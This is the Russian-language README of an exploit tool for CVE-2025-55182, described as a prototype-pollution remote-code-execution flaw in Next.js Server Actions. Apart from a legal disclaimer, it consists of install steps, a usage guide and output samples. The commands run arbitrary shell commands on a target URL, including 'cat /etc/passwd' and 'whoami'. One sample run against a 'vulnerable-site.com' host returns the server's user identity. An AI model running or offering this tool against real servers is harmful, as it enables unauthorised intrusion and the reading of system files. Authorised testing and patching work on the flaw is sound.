
CVE-2025-55182 Next.js RCE Exploit Tool
Китайская документация | Анализ принципов уязвимости
[!CAUTION]
⚠️ ОТКАЗ ОТ ОТВЕТСТВЕННОСТИ - ПРОЧТИТЕ ПЕРЕД ИСПОЛЬЗОВАНИЕМ
Этот инструмент предназначен ТОЛЬКО для:
- Исследователей безопасности, проводящих проверку уязвимостей
- Авторизованного тестирования на проникновение с явного разрешения
- Образовательных и учебных целей
Несанкционированный доступ к компьютерным системам НЕЗАКОНЕН.
Используя этот инструмент, вы соглашаетесь с тем, что:
- Вы получили надлежащее разрешение перед тестированием любой системы
- Вы не будете использовать этот инструмент в злонамеренных целях
- Вы несете единоличную ответственность за свои действия и любые последствия
Автор не несет НИКАКОЙ ответственности за неправомерное использование этого инструмента.
Инструмент для эксплуатации удаленного выполнения кода (RCE) для уязвимости загрязнения прототипа на стороне сервера Next.js.
CVE-2025-55182 — это критическая уязвимость безопасности, затрагивающая Next.js, которая позволяет злоумышленникам добиться удаленного выполнения кода с помощью специально созданных запросов, использующих загрязнение прототипа.
📖 Подробный технический анализ см. в EXPLOIT.md
Эта уязвимость использует механизм обработки запросов Server Actions в Next.js, достигая произвольного выполнения кода через загрязнение цепочки прототипов __proto__ в сочетании с конструктором Function.
# Using yarn
yarn install
# Using npm
npm install
# Basic usage
node index.js <target_url> [command]
# Examples
node index.js http://localhost:3000
node index.js http://localhost:3000 "ls -la"
node index.js http://localhost:3000 "cat /etc/passwd"
# Run the tool
yarn start http://localhost:3000 "whoami"
# Or use alias
yarn exploit http://localhost:3000 "ls -la"
# Show help
yarn help
# Link globally
yarn link
# or
npm link
# Then use the command directly
cve-2025-55182 http://localhost:3000
cve-2025-55182 http://localhost:3000 "whoami"
# Unlink
yarn unlink
Usage:
cve-2025-55182 <url> [command]
Arguments:
url Целевой URL (обязательно)
command Команда для выполнения (по умолчанию: whoami)
Options:
-h, --help Показать справку
-v, --version Показать номер версии
Инструмент выводит результаты в формате JSON:
{
"success": true,
"message": "",
"data": "command execution result"
}
{
"success": false,
"message": "error message",
"data": null
}
$ cve-2025-55182 http://vulnerable-site.com "id"
{
"success": true,
"message": "",
"data": "uid=1000(www-data) gid=1000(www-data) groups=1000(www-data)"
}